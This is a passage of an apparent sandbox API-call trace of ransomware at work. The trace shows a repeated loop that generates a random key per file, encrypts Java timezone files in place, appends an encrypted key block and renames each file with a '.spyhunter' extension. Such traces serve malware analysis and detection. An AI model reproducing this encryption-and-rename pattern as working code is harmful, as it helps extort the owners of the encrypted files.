lpOverlapped=0x0 | out: lpBuffer=0x57e63c*, lpNumberOfBytesWritten=0x57e5fc*=0x4, lpOverlapped=0x0) returned 1 [0169.621] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5fc*=0x30, lpOverlapped=0x0) returned 1 [0169.621] CloseHandle (hObject=0xa0) returned 1 [0169.621] GetProcessHeap () returned 0x2c0000 [0169.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.622] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan.spyhunter") returned 69 [0169.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan.spyhunter")) returned 1 [0169.622] GetProcessHeap () returned 0x2c0000 [0169.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.622] GetProcessHeap () returned 0x2c0000 [0169.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.623] GetProcessHeap () returned 0x2c0000 [0169.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9d00 | out: hHeap=0x2c0000) returned 1 [0169.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e638 | out: pbBuffer=0x57e638) returned 1 [0169.623] GetProcessHeap () returned 0x2c0000 [0169.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e630*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e630*=0x30) returned 1 [0169.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.623] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei") returned 55 [0169.623] StrStrW (lpFirst="Brunei", lpSrch=".txt") returned 0x0 [0169.623] GetProcessHeap () returned 0x2c0000 [0169.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.623] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5f4*=0x4d, lpOverlapped=0x0) returned 1 [0169.624] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.624] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5f4*=0x4d, lpOverlapped=0x0) returned 1 [0169.624] GetProcessHeap () returned 0x2c0000 [0169.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.624] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.624] WriteFile (in: hFile=0xa0, lpBuffer=0x57e634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x57e634*, lpNumberOfBytesWritten=0x57e5f4*=0x4, lpOverlapped=0x0) returned 1 [0169.625] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5f4*=0x30, lpOverlapped=0x0) returned 1 [0169.625] CloseHandle (hObject=0xa0) returned 1 [0169.625] GetProcessHeap () returned 0x2c0000 [0169.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.625] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei.spyhunter") returned 65 [0169.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei.spyhunter")) returned 1 [0169.625] GetProcessHeap () returned 0x2c0000 [0169.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.626] GetProcessHeap () returned 0x2c0000 [0169.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.626] GetProcessHeap () returned 0x2c0000 [0169.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26db0 | out: hHeap=0x2c0000) returned 1 [0169.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e638 | out: pbBuffer=0x57e638) returned 1 [0169.626] GetProcessHeap () returned 0x2c0000 [0169.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e630*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e630*=0x30) returned 1 [0169.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.627] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek") returned 56 [0169.627] StrStrW (lpFirst="Bishkek", lpSrch=".txt") returned 0x0 [0169.627] GetProcessHeap () returned 0x2c0000 [0169.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.627] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5f4*=0x1e5, lpOverlapped=0x0) returned 1 [0169.628] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.628] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1e5, lpNumberOfBytesWritten=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5f4*=0x1e5, lpOverlapped=0x0) returned 1 [0169.628] GetProcessHeap () returned 0x2c0000 [0169.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.628] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.628] WriteFile (in: hFile=0xa0, lpBuffer=0x57e634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x57e634*, lpNumberOfBytesWritten=0x57e5f4*=0x4, lpOverlapped=0x0) returned 1 [0169.628] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5f4*=0x30, lpOverlapped=0x0) returned 1 [0169.628] CloseHandle (hObject=0xa0) returned 1 [0169.628] GetProcessHeap () returned 0x2c0000 [0169.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.629] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek.spyhunter") returned 66 [0169.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek.spyhunter")) returned 1 [0169.629] GetProcessHeap () returned 0x2c0000 [0169.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.629] GetProcessHeap () returned 0x2c0000 [0169.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.629] GetProcessHeap () returned 0x2c0000 [0169.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9c40 | out: hHeap=0x2c0000) returned 1 [0169.629] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e630 | out: pbBuffer=0x57e630) returned 1 [0169.629] GetProcessHeap () returned 0x2c0000 [0169.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e628*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e628*=0x30) returned 1 [0169.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.630] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut") returned 55 [0169.630] StrStrW (lpFirst="Beirut", lpSrch=".txt") returned 0x0 [0169.630] GetProcessHeap () returned 0x2c0000 [0169.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.630] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5ec*=0x4b8, lpOverlapped=0x0) returned 1 [0169.676] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.676] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4b8, lpNumberOfBytesWritten=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5ec*=0x4b8, lpOverlapped=0x0) returned 1 [0169.676] GetProcessHeap () returned 0x2c0000 [0169.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.676] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.676] WriteFile (in: hFile=0xa0, lpBuffer=0x57e62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x57e62c*, lpNumberOfBytesWritten=0x57e5ec*=0x4, lpOverlapped=0x0) returned 1 [0169.676] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5ec*=0x30, lpOverlapped=0x0) returned 1 [0169.676] CloseHandle (hObject=0xa0) returned 1 [0169.676] GetProcessHeap () returned 0x2c0000 [0169.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.676] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut.spyhunter") returned 65 [0169.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut.spyhunter")) returned 1 [0169.677] GetProcessHeap () returned 0x2c0000 [0169.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.677] GetProcessHeap () returned 0x2c0000 [0169.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.677] GetProcessHeap () returned 0x2c0000 [0169.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26cf8 | out: hHeap=0x2c0000) returned 1 [0169.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e630 | out: pbBuffer=0x57e630) returned 1 [0169.677] GetProcessHeap () returned 0x2c0000 [0169.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e628*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e628*=0x30) returned 1 [0169.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.688] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera") returned 62 [0169.688] StrStrW (lpFirst="Rothera", lpSrch=".txt") returned 0x0 [0169.688] GetProcessHeap () returned 0x2c0000 [0169.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.688] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e5ec*=0x41, lpOverlapped=0x0) returned 1 [0169.689] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.689] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e5ec*=0x41, lpOverlapped=0x0) returned 1 [0169.689] GetProcessHeap () returned 0x2c0000 [0169.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.690] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.690] WriteFile (in: hFile=0xb0, lpBuffer=0x57e62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x57e62c*, lpNumberOfBytesWritten=0x57e5ec*=0x4, lpOverlapped=0x0) returned 1 [0169.690] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5ec*=0x30, lpOverlapped=0x0) returned 1 [0169.690] CloseHandle (hObject=0xb0) returned 1 [0169.690] GetProcessHeap () returned 0x2c0000 [0169.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.690] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera.spyhunter") returned 72 [0169.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Rothera.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\rothera.spyhunter")) returned 1 [0169.691] GetProcessHeap () returned 0x2c0000 [0169.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.691] GetProcessHeap () returned 0x2c0000 [0169.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.691] GetProcessHeap () returned 0x2c0000 [0169.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebaa70 | out: hHeap=0x2c0000) returned 1 [0169.692] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e628 | out: pbBuffer=0x57e628) returned 1 [0169.692] GetProcessHeap () returned 0x2c0000 [0169.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.692] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e620*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e620*=0x30) returned 1 [0169.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.693] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo") returned 62 [0169.693] StrStrW (lpFirst="McMurdo", lpSrch=".txt") returned 0x0 [0169.693] GetProcessHeap () returned 0x2c0000 [0169.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.693] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e5e4*=0x464, lpOverlapped=0x0) returned 1 [0169.740] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.740] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e5e4*=0x464, lpOverlapped=0x0) returned 1 [0169.741] GetProcessHeap () returned 0x2c0000 [0169.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.741] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.741] WriteFile (in: hFile=0xb0, lpBuffer=0x57e624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x57e624*, lpNumberOfBytesWritten=0x57e5e4*=0x4, lpOverlapped=0x0) returned 1 [0169.741] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5e4*=0x30, lpOverlapped=0x0) returned 1 [0169.741] CloseHandle (hObject=0xb0) returned 1 [0169.742] GetProcessHeap () returned 0x2c0000 [0169.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.742] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo.spyhunter") returned 72 [0169.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\McMurdo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\mcmurdo.spyhunter")) returned 1 [0169.743] GetProcessHeap () returned 0x2c0000 [0169.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.743] GetProcessHeap () returned 0x2c0000 [0169.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.743] GetProcessHeap () returned 0x2c0000 [0169.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba818 | out: hHeap=0x2c0000) returned 1 [0169.743] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e628 | out: pbBuffer=0x57e628) returned 1 [0169.743] GetProcessHeap () returned 0x2c0000 [0169.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.743] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e620*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e620*=0x30) returned 1 [0169.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.744] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville") returned 69 [0169.744] StrStrW (lpFirst="DumontDUrville", lpSrch=".txt") returned 0x0 [0169.744] GetProcessHeap () returned 0x2c0000 [0169.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.744] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e5e4*=0x51, lpOverlapped=0x0) returned 1 [0169.746] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.746] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e5e4*=0x51, lpOverlapped=0x0) returned 1 [0169.746] GetProcessHeap () returned 0x2c0000 [0169.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.746] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.746] WriteFile (in: hFile=0xb0, lpBuffer=0x57e624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x57e624*, lpNumberOfBytesWritten=0x57e5e4*=0x4, lpOverlapped=0x0) returned 1 [0169.746] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5e4*=0x30, lpOverlapped=0x0) returned 1 [0169.746] CloseHandle (hObject=0xb0) returned 1 [0169.746] GetProcessHeap () returned 0x2c0000 [0169.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.746] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville.spyhunter") returned 79 [0169.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville.spyhunter")) returned 1 [0169.747] GetProcessHeap () returned 0x2c0000 [0169.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.747] GetProcessHeap () returned 0x2c0000 [0169.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.747] GetProcessHeap () returned 0x2c0000 [0169.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d8a8 | out: hHeap=0x2c0000) returned 1 [0169.747] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e620 | out: pbBuffer=0x57e620) returned 1 [0169.747] GetProcessHeap () returned 0x2c0000 [0169.747] RtlAllocateHeap 